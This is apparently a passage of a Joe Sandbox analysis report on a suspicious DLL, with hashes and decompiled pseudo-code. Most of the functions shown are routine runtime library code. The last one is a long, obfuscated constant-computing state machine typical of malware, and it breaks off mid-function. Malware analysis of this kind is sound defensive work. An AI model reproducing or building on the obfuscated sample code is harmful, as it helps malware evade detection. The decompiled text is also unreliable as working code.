Opcode ID: 8d67e2f2c720a78b49b425f6701a34797689553c0969d020a55b0e3ec6f982fa
Instruction ID: 8b2bf3c397adba9723e4f4b26107109d751343bbce2f60a073e65f60d77ffac1
Opcode Fuzzy Hash: 8d67e2f2c720a78b49b425f6701a34797689553c0969d020a55b0e3ec6f982fa
Instruction Fuzzy Hash: 6C317F326001049FE720CF19DD85BABB7E9EF44786F15441AF944DB251D671ED90DB90

Uniqueness

Uniqueness Score: -1.00%

Function 100066E8, Relevance: 1.5, APIs: 1, Instructions: 23
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 68%

			E100066E8(void* __ebx, intOrPtr* __ecx) {
				void* __edi;
				void* __esi;
				intOrPtr _t5;
				intOrPtr* _t11;
				intOrPtr* _t12;
				void* _t13;

				_t11 = __ecx;
				_push(4);
				 *__ecx = 0x1001e1bc;
				_t12 = E10007764(__ebx, __ecx, _t13);
				_t14 = _t12;
				if(_t12 == 0) {
					_t12 = 0;
					__eflags = 0;
				} else {
					_push(1); // executed
					_t5 = E100063B8(__ebx, _t11, _t12, _t14); // executed
					 *_t12 = _t5;
				}
				 *((intOrPtr*)(_t11 + 0x34)) = _t12;
				E10006A95(_t11);
				return _t11;
			}

0x100066ea
0x100066ec
0x100066ee
0x100066f9
0x100066fc
0x100066fe
0x1000670c
0x1000670c
0x10006700
0x10006700
0x10006702
0x10006708
0x10006708
0x10006710
0x10006713
0x1000671c

APIs

Part of subcall function 10007764: _malloc.LIBCMT ref: 1000777C

std::locale::_Init.LIBCPMT ref: 10006702

Part of subcall function 100063B8: __EH_prolog3.LIBCMT ref: 100063BF
Part of subcall function 100063B8: std::_Lockit::_Lockit.LIBCPMT ref: 100063C9
Part of subcall function 100063B8: std::locale::_Setgloballocale.LIBCPMT ref: 100063E5
Part of subcall function 100063B8: _Yarn.LIBCPMT ref: 100063FB

Memory Dump Source

Source File: 00000007.00000002.2144561604.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2144552179.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2144633674.000000001001D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2144648856.0000000010026000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2144655977.000000001002A000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: std::locale::_$H_prolog3InitLockitLockit::_SetgloballocaleYarn_mallocstd::_
String ID:
API String ID: 2823998849-0
Opcode ID: 5611ff6b5133a75f8ec30c28dea7972144c6be728473fcbed06e3f151fa0e010
Instruction ID: ccb850e466b795182def5d23107f1f217bb87838a26bdd73866649cb201627af
Opcode Fuzzy Hash: 5611ff6b5133a75f8ec30c28dea7972144c6be728473fcbed06e3f151fa0e010
Instruction Fuzzy Hash: 00E0CD7670566296F214DA196C01149A796DF85BE0B31001AF5049F389CAB05C4046F0

Uniqueness

Uniqueness Score: -1.00%

Function 100064FA, Relevance: 1.5, APIs: 1, Instructions: 15
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 58%

			E100064FA(intOrPtr _a4) {
				void* _t2;
				void* _t5;
				void* _t8;
				void* _t9;

				_push(0x20); // executed
				_t2 = E10007764(_t5, _t8, _t9); // executed
				if(_t2 == 0) {
					__eflags = 0;
					return 0;
				} else {
					return E10006276(_t2, _a4);
				}
			}

0x100064fd
0x100064ff
0x10006507
0x10006515
0x10006518
0x10006509
0x10006514
0x10006514

APIs

Part of subcall function 10007764: _malloc.LIBCMT ref: 1000777C

std::locale::_Locimp::_Locimp.LIBCPMT ref: 1000650E

Part of subcall function 10006276: _Yarn.LIBCPMT ref: 100062A7

Memory Dump Source

Source File: 00000007.00000002.2144561604.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2144552179.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2144633674.000000001001D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2144648856.0000000010026000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2144655977.000000001002A000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: LocimpLocimp::_Yarn_mallocstd::locale::_
String ID:
API String ID: 3311019319-0
Opcode ID: cdfed9e95fa2647b8d77770e4776b30de9d2fdf0f4cc3ec2ac8fcd7241b3d1d7
Instruction ID: ab0ec43a834fe9558ab7d64ebf3693aa4c28759bef10425ae47bb6cbfca7e0cc
Opcode Fuzzy Hash: cdfed9e95fa2647b8d77770e4776b30de9d2fdf0f4cc3ec2ac8fcd7241b3d1d7
Instruction Fuzzy Hash: A5C08C29648F0922FE00A5F1AC06A293B8ECB854F4F104061F80C8968AFC26E9508050

Uniqueness

Uniqueness Score: -1.00%

Function 1000E0D6, Relevance: 1.5, APIs: 1, Instructions: 6
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 25%

			E1000E0D6() {
				void* _t1;
				void* _t2;
				void* _t3;
				void* _t4;
				void* _t5;
				void* _t8;

				_push(1);
				_push(0);
				_push(0); // executed
				_t1 = E1000E21F(_t2, _t3, _t4, _t5, _t8); // executed
				return _t1;
			}

0x1000e0d6
0x1000e0d8
0x1000e0da
0x1000e0dc
0x1000e0e4

APIs

_doexit.LIBCMT ref: 1000E0DC

Part of subcall function 1000E21F: __lock.LIBCMT ref: 1000E22D
Part of subcall function 1000E21F: DecodePointer.KERNEL32(10024B68,0000001C,1000E178,00000000,00000001,00000000,?,1000E0D5,000000FF,?,10009140,00000011,00000000,?,1000F400,0000000D), ref: 1000E26C
Part of subcall function 1000E21F: DecodePointer.KERNEL32(?,1000E0D5,000000FF,?,10009140,00000011,00000000,?,1000F400,0000000D), ref: 1000E27D
Part of subcall function 1000E21F: EncodePointer.KERNEL32(00000000,?,1000E0D5,000000FF,?,10009140,00000011,00000000,?,1000F400,0000000D), ref: 1000E296
Part of subcall function 1000E21F: DecodePointer.KERNEL32(-00000004,?,1000E0D5,000000FF,?,10009140,00000011,00000000,?,1000F400,0000000D), ref: 1000E2A6
Part of subcall function 1000E21F: EncodePointer.KERNEL32(00000000,?,1000E0D5,000000FF,?,10009140,00000011,00000000,?,1000F400,0000000D), ref: 1000E2AC
Part of subcall function 1000E21F: DecodePointer.KERNEL32(?,1000E0D5,000000FF,?,10009140,00000011,00000000,?,1000F400,0000000D), ref: 1000E2C2
Part of subcall function 1000E21F: DecodePointer.KERNEL32(?,1000E0D5,000000FF,?,10009140,00000011,00000000,?,1000F400,0000000D), ref: 1000E2CD
Part of subcall function 1000E21F: __initterm.LIBCMT ref: 1000E2F5
Part of subcall function 1000E21F: __initterm.LIBCMT ref: 1000E306

Memory Dump Source

Source File: 00000007.00000002.2144561604.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2144552179.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2144633674.000000001001D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2144648856.0000000010026000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2144655977.000000001002A000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: Pointer$Decode$Encode__initterm$__lock_doexit
String ID:
API String ID: 3712619029-0
Opcode ID: 78529122e2b46a8e68c069f2daa41a4ac46c1808f6e5ab6ec0525ec87f7e3659
Instruction ID: 25d66905ba3061ac236faf098272dd66e7f77e3d6a8e52e1df420f3455b87b02
Opcode Fuzzy Hash: 78529122e2b46a8e68c069f2daa41a4ac46c1808f6e5ab6ec0525ec87f7e3659
Instruction Fuzzy Hash: AAA00269BD434431F8A091502D53F5421055BB0F41FD40090BB183C1C5A4C627584057

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 001A8B16, Relevance: 38.5, Strings: 30, Instructions: 1038
COMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E001A8B16() {
				char _v68;
				signed int _v72;
				signed int _v80;
				signed int _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				char _v112;
				signed int _v116;
				char _v124;
				signed int _v132;
				char _v140;
				char _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				unsigned int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				unsigned int _v260;
				signed int _v264;
				signed int _v268;
				unsigned int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				signed int _v292;
				signed int _v296;
				unsigned int _v300;
				signed int _v304;
				signed int _v308;
				signed int _v312;
				signed int _v316;
				signed int _v320;
				signed int _v324;
				signed int _v328;
				signed int _v332;
				signed int _v336;
				signed int _v340;
				signed int _v344;
				signed int _v348;
				signed int _v352;
				signed int _v356;
				unsigned int _v360;
				signed int _v364;
				signed int _v368;
				signed int _v372;
				signed int _v376;
				signed int _v380;
				signed int _v384;
				signed int _v388;
				signed int _v392;
				signed int _v396;
				signed int _v400;
				signed int _v404;
				signed int _v408;
				signed int _v412;
				signed int _v416;
				signed int _v420;
				signed int _v424;
				signed int _v428;
				signed int _v432;
				signed int _v436;
				signed int _v440;
				signed int _v444;
				signed int _v448;
				signed int _v452;
				signed int _v456;
				signed int _v460;
				signed int _v464;
				signed int _v468;
				signed int _v472;
				unsigned int _v476;
				signed int _v480;
				signed int _v484;
				signed int _v488;
				signed int _v492;
				signed int _v496;
				signed int _v500;
				signed int _v504;
				signed int _v508;
				signed int _v512;
				signed int _v516;
				signed int _v520;
				signed int _v524;
				signed int _v528;
				signed int _v532;
				signed int _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				unsigned int _v552;
				signed int _v556;
				signed int _v560;
				signed int _t1010;
				void* _t1019;
				signed int _t1020;
				void* _t1033;
				void* _t1067;
				void* _t1091;
				signed int _t1093;
				signed int _t1094;
				signed int _t1117;
				signed int _t1188;
				signed int _t1192;
				signed int _t1193;
				signed int _t1199;
				signed int _t1200;
				signed int _t1201;
				signed int _t1202;
				signed int _t1203;
				signed int _t1204;
				signed int _t1205;
				signed int _t1206;
				signed int _t1207;
				signed int _t1208;
				signed int _t1209;
				signed int _t1210;
				signed int _t1211;
				signed int _t1212;
				signed int _t1213;
				signed int _t1214;
				signed int _t1215;
				signed int _t1216;
				signed int _t1223;
				signed int _t1225;
				void* _t1227;
				void* _t1229;
				void* _t1235;
				void* _t1236;
				void* _t1237;

				_t1227 = (_t1225 & 0xfffffff8) - 0x230;
				_v552 = 0xa611;
				_v552 = _v552 >> 6;
				_t1096 = 0x3753589a;
				_v552 = _v552 + 0xffffbbab;
				_v552 = _v552 + 0xb82;
				_v552 = _v552 ^ 0xffffb62d;
				_v408 = 0xd63c;
				_v408 = _v408 | 0x2d30ecd1;
				_v408 = _v408 + 0x4a88;
				_v408 = _v408 ^ 0x2d310fb6;
				_v288 = 0xfcef;
				_v288 = _v288 + 0xb91e;
				_v288 = _v288 << 6;
				_v288 = _v288 ^ 0x006dfdf3;
				_v352 = 0xd11e;
				_v352 = _v352 << 0x10;
				_v352 = _v352 ^ 0xd187f0d8;
				_v352 = _v352 ^ 0x0099c431;
				_v344 = 0xb957;
				_t1199 = 0x3a;
				_v344 = _v344 / _t1199;
				_v344 = _v344 * 0x4d;
				_v344 = _v344 ^ 0x0000cd31;
				_v372 = 0x9432;
				_v372 = _v372 | 0xc1dd440c;
				_v372 = _v372 ^ 0xbde3bf42;
				_v372 = _v372 ^ 0x7c3e45cb;
				_v300 = 0x8992;
				_v300 = _v300 | 0xaa197510;
				_v300 = _v300 >> 3;
				_v300 = _v300 ^ 0x15434bfd;
				_v332 = 0xe27;
				_v332 = _v332 << 0xb;
				_v332 = _v332 ^ 0x2fdb4e06;
				_v332 = _v332 ^ 0x2faa6389;
				_v528 = 0x43bc;
				_v528 = _v528 ^ 0x6d5b72a2;
				_v528 = _v528 << 7;
				_v528 = _v528 + 0xe990;
				_v528 = _v528 ^ 0xad993815;
				_v292 = 0xc4da;
				_v292 = _v292 * 0x2a;
				_v292 = _v292 + 0xffff6485;
				_v292 = _v292 ^ 0x001f8496;
				_v240 = 0xe975;
				_v240 = _v240 * 0x3b;
				_v240 = _v240 ^ 0x0035a032;
				_v284 = 0x8dde;
				_v284 = _v284 * 0x6a;
				_v284 = _v284 << 0xb;
				_v284 = _v284 ^ 0xd5ef4560;
				_v480 = 0x31c7;
				_v480 = _v480 + 0x982a;
				_v480 = _v480 << 0xd;
				_v480 = _v480 + 0xc9d7;
				_v480 = _v480 ^ 0x193e8817;
				_v396 = 0xb7f2;
				_v396 = _v396 + 0xb566;
				_v396 = _v396 + 0xda08;
				_v396 = _v396 ^ 0x00024958;
				_v256 = 0xd53e;
				_v256 = _v256 + 0xffff4a14;
				_v256 = _v256 ^ 0x00006f69;
				_v228 = 0x32d4;
				_v228 = _v228 * 0x15;
				_v228 = _v228 ^ 0x00042ea7;
				_v340 = 0x96a;
				_t1200 = 0x6c;
				_v340 = _v340 / _t1200;
				_v340 = _v340 | 0x4730b43d;
				_v340 = _v340 ^ 0x4730c280;
				_v420 = 0x42c4;
				_t1201 = 0x7c;
				_v420 = _v420 / _t1201;
				_v420 = _v420 ^ 0xb0a1ac1b;
				_v420 = _v420 ^ 0xb0a1e8da;
				_v544 = 0xf6dd;
				_v544 = _v544 << 1;
				_v544 = _v544 << 0xd;
				_v544 = _v544 + 0x6cb9;
				_v544 = _v544 ^ 0x3db7bb4a;
				_v200 = 0x4231;
				_t1202 = 0x41;
				_v200 = _v200 * 0x75;
				_v200 = _v200 ^ 0x001e7faf;
				_v176 = 0xa2d9;
				_v176 = _v176 + 0xffff644f;
				_v176 = _v176 ^ 0x000018c6;
				_v536 = 0xa9a1;
				_v536 = _v536 * 0x60;
				_v536 = _v536 | 0xfebffedf;
				_v536 = _v536 ^ 0xfebfa2dc;
				_v404 = 0x236c;
				_v404 = _v404 + 0xde4a;
				_v404 = _v404 << 0xc;
				_v404 = _v404 ^ 0x101b6517;
				_v476 = 0x4a9b;
				_v476 = _v476 + 0xb3d1;
				_v476 = _v476 | 0x1b947aec;
				_v476 = _v476 >> 0x10;
				_v476 = _v476 ^ 0x000047ac;
				_v380 = 0xdac2;
				_v380 = _v380 + 0xffff8154;
				_v380 = _v380 << 2;
				_v380 = _v380 ^ 0x00014bf4;
				_v160 = 0x7fd3;
				_v160 = _v160 << 0xc;
				_v160 = _v160 ^ 0x07fd17c7;
				_v232 = 0x6c02;
				_v232 = _v232 / _t1202;
				_v232 = _v232 ^ 0x00000a74;
				_v444 = 0xc1b5;
				_t1203 = 0x7e;
				_v444 = _v444 * 0x65;
				_v444 = _v444 ^ 0x139ab27c;
				_v444 = _v444 >> 0xe;
				_v444 = _v444 ^ 0x00002836;
				_v460 = 0xbbc1;
				_v460 = _v460 + 0x541c;
				_v460 = _v460 / _t1203;
				_v460 = _v460 >> 2;
				_v460 = _v460 ^ 0x00005e3f;
				_v224 = 0xc4ba;
				_v224 = _v224 + 0xe0b2;
				_v224 = _v224 ^ 0x00019464;
				_v356 = 0x4aed;
				_v356 = _v356 | 0xa8125727;
				_v356 = _v356 << 6;
				_v356 = _v356 ^ 0x04978e60;
				_v500 = 0x8bcb;
				_t1093 = 7;
				_t1204 = 0x39;
				_v500 = _v500 * 9;
				_v500 = _v500 ^ 0x3b13b652;
				_v500 = _v500 / _t1093;
				_v500 = _v500 ^ 0x0871452a;
				_v560 = 0xdccf;
				_v560 = _v560 + 0xffff66fd;
				_v560 = _v560 * 0x6b;
				_v560 = _v560 * 0x42;
				_v560 = _v560 ^ 0x074e4505;
				_v308 = 0x81ec;
				_v308 = _v308 + 0x1dde;
				_v308 = _v308 << 0xe;
				_v308 = _v308 ^ 0x27f29ee4;
				_v492 = 0xd6e1;
				_v492 = _v492 << 4;
				_v492 = _v492 << 8;
				_v492 = _v492 << 3;
				_v492 = _v492 ^ 0x6b70840d;
				_v384 = 0x8b45;
				_v384 = _v384 / _t1204;
				_t1205 = 0x47;
				_v384 = _v384 / _t1205;
				_v384 = _v384 ^ 0x00000d12;
				_v360 = 0xb085;
				_v360 = _v360 ^ 0xd8410577;
				_v360 = _v360 >> 9;
				_v360 = _v360 ^ 0x006c1250;
				_v368 = 0xcf2b;
				_v368 = _v368 >> 0x10;
				_v368 = _v368 << 4;
				_v368 = _v368 ^ 0x000068b4;
				_v376 = 0x5c77;
				_v376 = _v376 * 0x41;
				_v376 = _v376 + 0xffff974f;
				_v376 = _v376 ^ 0x001738a1;
				_v496 = 0xaa30;
				_v496 = _v496 << 6;
				_v496 = _v496 | 0x410a4c68;
				_v496 = _v496 * 0x31;
				_v496 = _v496 ^ 0x79313fdc;
				_v452 = 0xc5d3;
				_v452 = _v452 << 0xb;
				_v452 = _v452 | 0x8332a5d6;
				_v452 = _v452 << 4;
				_v452 = _v452 ^ 0x73ebff91;
				_v540 = 0x5fe6;
				_v540 = _v540 + 0x8c36;
				_v540 = _v540 + 0xfffff306;
				_v540 = _v540 + 0xe335;
				_v540 = _v540 ^ 0x0001ed35;
				_v532 = 0x8e9b;
				_v532 = _v532 * 0x27;
				_v532 = _v532 ^ 0xc7071994;
				_v532 = _v532 | 0x7190d13c;
				_v532 = _v532 ^ 0xf7928315;
				_v168 = 0x21d6;
				_v168 = _v168 + 0xffff7189;
				_v168 = _v168 ^ 0xffff9ff4;
				_v504 = 0xd3e3;
				_v504 = _v504 + 0x48e3;
				_v504 = _v504 ^ 0x96c92b34;
				_v504 = _v504 + 0xffff9ae2;
				_v504 = _v504 ^ 0x96c7da21;
				_v484 = 0x90e;
				_v484 = _v484 ^ 0xd2d7c067;
				_v484 = _v484 >> 6;
				_v484 = _v484 ^ 0xd4c96012;
				_v484 = _v484 ^ 0xd7820f73;
				_v324 = 0xe4f5;
				_v324 = _v324 ^ 0xfb2f0ae8;
				_v324 = _v324 + 0xbfe;
				_v324 = _v324 ^ 0xfb2f8388;
				_v400 = 0x7049;
				_v400 = _v400 ^ 0x1ba178d8;
				_t1206 = 0x50;
				_v400 = _v400 * 0x1f;
				_v400 = _v400 ^ 0x588065be;
				_v260 = 0x89e7;
				_v260 = _v260 >> 0xf;
				_v260 = _v260 ^ 0x00002b9f;
				_v244 = 0x4159;
				_v244 = _v244 >> 8;
				_v244 = _v244 ^ 0x00005d4c;
				_v520 = 0xd1a7;
				_v520 = _v520 * 0x58;
				_v520 = _v520 << 0xc;
				_v520 = _v520 + 0xffff83b2;
				_v520 = _v520 ^ 0x81165e0d;
				_v252 = 0x675e;
				_v252 = _v252 + 0x19b2;
				_v252 = _v252 ^ 0x0000ae51;
				_v392 = 0x1499;
				_v392 = _v392 << 9;
				_v392 = _v392 + 0xffff09a2;
				_v392 = _v392 ^ 0x002848e0;
				_v512 = 0xf6eb;
				_v512 = _v512 + 0xffff2177;
				_v512 = _v512 ^ 0xaf5f6e3b;
				_v512 = _v512 ^ 0xa20e8793;
				_v512 = _v512 ^ 0x0d51fdfe;
				_v336 = 0x102a;
				_v336 = _v336 + 0xffffc12b;
				_v336 = _v336 + 0x992e;
				_v336 = _v336 ^ 0x000048b0;
				_v236 = 0xc7dd;
				_v236 = _v236 + 0x5a5d;
				_v236 = _v236 ^ 0x000135b9;
				_v488 = 0x986e;
				_v488 = _v488 * 0x5f;
				_v488 = _v488 + 0xffff2eab;
				_v488 = _v488 ^ 0x4bd47303;
				_v488 = _v488 ^ 0x4be38ed6;
				_v472 = 0x6af0;
				_v472 = _v472 + 0xc863;
				_v472 = _v472 / _t1206;
				_t1207 = 0x3f;
				_v472 = _v472 / _t1207;
				_v472 = _v472 ^ 0x00005e7c;
				_v220 = 0xfb72;
				_v220 = _v220 | 0x981e77fa;
				_v220 = _v220 ^ 0x981ef6e3;
				_v464 = 0xc06c;
				_v464 = _v464 >> 5;
				_v464 = _v464 + 0xd198;
				_v464 = _v464 << 8;
				_v464 = _v464 ^ 0x00d7a9ca;
				_v312 = 0x83c6;
				_v312 = _v312 >> 0xf;
				_t1208 = 0x2a;
				_v312 = _v312 / _t1208;
				_v312 = _v312 ^ 0x0000748c;
				_v320 = 0x52c6;
				_v320 = _v320 + 0xffffa273;
				_v320 = _v320 + 0x6f66;
				_v320 = _v320 ^ 0x00004fc2;
				_v456 = 0x4e2a;
				_v456 = _v456 | 0xd38047d3;
				_v456 = _v456 + 0xffff9170;
				_t1209 = 0x14;
				_v456 = _v456 / _t1209;
				_v456 = _v456 ^ 0x0a93340f;
				_v328 = 0x84cf;
				_v328 = _v328 | 0xc59169e0;
				_v328 = _v328 + 0x6f96;
				_v328 = _v328 ^ 0xc592396d;
				_v448 = 0xfac;
				_v448 = _v448 >> 4;
				_t1210 = 0x6e;
				_v448 = _v448 / _t1210;
				_v448 = _v448 << 2;
				_v448 = _v448 ^ 0x00001dd7;
				_v212 = 0xa2c2;
				_v212 = _v212 ^ 0x0893172c;
				_v212 = _v212 ^ 0x0893c72a;
				_v440 = 0xc3d2;
				_v440 = _v440 >> 5;
				_v440 = _v440 << 0xd;
				_t1211 = 0x71;
				_v440 = _v440 * 0x19;
				_v440 = _v440 ^ 0x131d8707;
				_v196 = 0x539;
				_v196 = _v196 | 0xc76f09e9;
				_v196 = _v196 ^ 0xc76f108f;
				_v204 = 0x154e;
				_v204 = _v204 >> 0xa;
				_v204 = _v204 ^ 0x00006664;
				_v432 = 0xfcbd;
				_v432 = _v432 / _t1211;
				_v432 = _v432 + 0xe5cb;
				_v432 = _v432 << 0xa;
				_v432 = _v432 ^ 0x03a053eb;
				_v304 = 0x778d;
				_v304 = _v304 + 0x928a;
				_t1212 = 0x7a;
				_v304 = _v304 / _t1212;
				_v304 = _v304 ^ 0x00004238;
				_v316 = 0x33c;
				_v316 = _v316 << 0xe;
				_v316 = _v316 + 0xffffae02;
				_v316 = _v316 ^ 0x00cea70f;
				_v468 = 0x9824;
				_t1192 = 0x6f;
				_v468 = _v468 / _t1192;
				_v468 = _v468 + 0xffff818c;
				_t1213 = 0x2d;
				_v468 = _v468 / _t1213;
				_v468 = _v468 ^ 0x05b00d26;
				_v516 = 0x6571;
				_v516 = _v516 / _t1192;
				_v516 = _v516 << 0xe;
				_v516 = _v516 + 0xffff691a;
				_v516 = _v516 ^ 0x0039f65a;
				_v364 = 0x8f76;
				_v364 = _v364 | 0xb3117de9;
				_v364 = _v364 + 0xffff2e20;
				_v364 = _v364 ^ 0xb3117092;
				_v508 = 0x61d4;
				_t1214 = 0x56;
				_v508 = _v508 * 0x5f;
				_v508 = _v508 / _t1214;
				_v508 = _v508 + 0x6879;
				_v508 = _v508 ^ 0x0000b523;
				_v556 = 0xa1b8;
				_t1215 = 0x2e;
				_v556 = _v556 * 0x68;
				_v556 = _v556 * 0x63;
				_v556 = _v556 << 2;
				_v556 = _v556 ^ 0x65a0e423;
				_v280 = 0xf392;
				_v280 = _v280 * 0x63;
				_v280 = _v280 ^ 0x78f7b80d;
				_v280 = _v280 ^ 0x78a9e3a2;
				_v172 = 0x7b9d;
				_v172 = _v172 + 0xffff627f;
				_v172 = _v172 ^ 0xffffa88d;
				_v216 = 0x6704;
				_v216 = _v216 + 0xcaa9;
				_v216 = _v216 ^ 0x00014502;
				_v348 = 0x738a;
				_v348 = _v348 ^ 0xe36f6706;
				_v348 = _v348 << 0xd;
				_v348 = _v348 ^ 0xe29183b5;
				_v164 = 0x54d1;
				_v164 = _v164 + 0x29c7;
				_v164 = _v164 ^ 0x0000560f;
				_v436 = 0xf108;
				_v436 = _v436 / _t1215;
				_v436 = _v436 + 0xffffcfd7;
				_v436 = _v436 + 0xffffcbf2;
				_v436 = _v436 ^ 0xffffe07a;
				_v524 = 0x9e18;
				_v524 = _v524 + 0xffffc415;
				_v524 = _v524 | 0x606d12e6;
				_v524 = _v524 ^ 0x547ddac5;
				_v524 = _v524 ^ 0x3410f8de;
				_v416 = 0x6ca7;
				_v416 = _v416 * 0x52;
				_v416 = _v416 * 0x46;
				_v416 = _v416 ^ 0x09846d74;
				_v296 = 0x6b20;
				_v296 = _v296 >> 0x10;
				_v296 = _v296 | 0x10740d98;
				_v296 = _v296 ^ 0x10746aaa;
				_v180 = 0x8240;
				_v180 = _v180 + 0xfffff4eb;
				_v180 = _v180 ^ 0x00005d37;
				_v208 = 0xd204;
				_t1216 = 0x44;
				_t1094 = _v152;
				_t1193 = _v156;
				_v208 = _v208 * 9;
				_v208 = _v208 ^ 0x000707cd;
				_v276 = 0x5f97;
				_v276 = _v276 >> 7;
				_v276 = _v276 + 0xffff3a76;
				_v276 = _v276 ^ 0xffff7a0d;
				_v184 = 0x8218;
				_v184 = _v184 ^ 0xc24e7798;
				_v184 = _v184 ^ 0xc24e92dc;
				_v264 = 0xe4dc;
				_v264 = _v264 + 0x5433;
				_v264 = _v264 ^ 0x00011499;
				_v188 = 0x7ac1;
				_t1223 = _v264;
				_v188 = _v188 * 0x5e;
				_v188 = _v188 ^ 0x002d4a1f;
				_v268 = 0xe7b6;
				_v268 = _v268 * 0x75;
				_v268 = _v268 << 5;
				_v268 = _v268 ^ 0x0d3ce796;
				_v428 = 0xfe35;
				_v428 = _v428 | 0x2bff5b77;
				_v428 = _v428 + 0x66fc;
				_v428 = _v428 ^ 0x2c0065c8;
				_v272 = 0xe39c;
				_v272 = _v272 + 0xffff2d90;
				_v272 = _v272 >> 0x10;
				_v272 = _v272 ^ 0x000035e0;
				_v548 = 0x3083;
				_v548 = _v548 | 0x51b2bf79;
				_v548 = _v548 + 0xffff5659;
				_v548 = _v548 ^ 0x9c5fbfd9;
				_v548 = _v548 ^ 0xcdedd157;
				_v248 = 0x9c64;
				_v248 = _v248 + 0x392c;
				_v248 = _v248 ^ 0x00009caf;
				_v192 = 0xe929;
				_v192 = _v192 + 0xfffff3cb;
				_v192 = _v192 ^ 0x0000c4f8;
				_v388 = 0x9fa8;
				_v388 = _v388 << 9;
				_v388 = _v388 ^ 0xec84449d;
				_v388 = _v388 ^ 0xedbb4000;
				_v424 = 0xac1c;
				_v424 = _v424 * 0x5b;
				_v424 = _v424 << 3;
				_v424 = _v424 / _t1216;
				_v424 = _v424 ^ 0x0007165b;
				_v412 = 0x527a;
				_v412 = _v412 + 0xffffa879;
				_v412 = _v412 | 0x26c13b46;
				_v412 = _v412 ^ 0xfffffee4;
				while(1) {
					L1:
					do {
						while(1) {
							L2:
							_t1235 = _t1096 - 0x1de2d3e5;
							if(_t1235 > 0) {
								goto L61;
							}
							L3:
							if(_t1235 == 0) {
								_t1020 = E001A3AC0(_t1096, __eflags);
								__eflags = _t1020;
								if(__eflags == 0) {
									L112:
									return _t1020;
								}
								_t1096 = 0x5c80354;
								while(1) {
									L2:
									_t1235 = _t1096 - 0x1de2d3e5;
									if(_t1235 > 0) {
										goto L61;
									}
									goto L3;
								}
								goto L61;
							}
							_t1236 = _t1096 - 0xfcc2a91;
							if(_t1236 > 0) {
								__eflags = _t1096 - 0x181af132;
								if(__eflags > 0) {
									__eflags = _t1096 - 0x1882a564;
									if(__eflags == 0) {
										_t1188 = _v216;
										_t1020 = E001B2B45(_v172, _t1188, __eflags, _v348, _v164,  &_v124);
										_t1227 = _t1227 + 0xc;
										__eflags = _t1020;
										if(__eflags != 0) {
											asm("xorps xmm0, xmm0");
											_t1223 = 0x27f3eb9e;
											asm("movlpd [esp+0x1a8], xmm0");
											_t1094 = _v152;
											_t1193 = _v156;
										}
										L58:
										_t1096 = 0x168f72b9;
										continue;
									}
									__eflags = _t1096 - 0x18e9918c;
									if(__eflags == 0) {
										_t1096 = 0x361af6e7;
										continue;
									}
									__eflags = _t1096 - 0x1c904052;
									if(__eflags == 0) {
										_push(_v444);
										_v148 = E001B17BC( &_v144, _v160, __eflags, _v232, _t1096);
										E001B9494( &_v144,  &_v148, __eflags, _v460, _v224, _v356, _v500);
										_t1188 = _v148;
										_t1020 = E001AED35(_v560, _t1188, _v308, _v492);
										_t1227 = _t1227 + 0x24;
										_t1096 = 0x18e9918c;
										continue;
									}
									__eflags = _t1096 - 0x1dcb1bf4;
									if(_t1096 != 0x1dcb1bf4) {
										break;
									}
									_t1188 = _v88;
									_t1020 = E001AE380(_v276, _t1188, _v184);
									L34:
									_t1096 = 0x38fcb7;
									continue;
								}
								if(__eflags == 0) {
									_t1188 = _v468;
									_t1020 = E001A6D2C(_v316, _t1188, _v516,  &_v124,  &_v132);
									_t1227 = _t1227 + 0xc;
									__eflags = _t1020;
									if(__eflags == 0) {
										goto L58;
									}
									_t1020 = E001BC3B6();
									__eflags = _v116;
									_t1096 = 0x4363fef;
									if(__eflags != 0) {
										__eflags = _v116 - 7;
										_t1096 =  ==  ? 0xfcc2a91 : 0x4363fef;
									}
									continue;
								}
								__eflags = _t1096 - 0x11417d6c;
								if(_t1096 == 0x11417d6c) {
									_t1020 = E001AE871();
									goto L112;
								}
								__eflags = _t1096 - 0x116d33a8;
								if(_t1096 == 0x116d33a8) {
									_t1020 = E001B7D78();
									asm("sbb ecx, ecx");
									_t1096 = ( ~_t1020 & 0x07e38455) + 0x2614d4c0;
									continue;
								}
								__eflags = _t1096 - 0x167196bc;
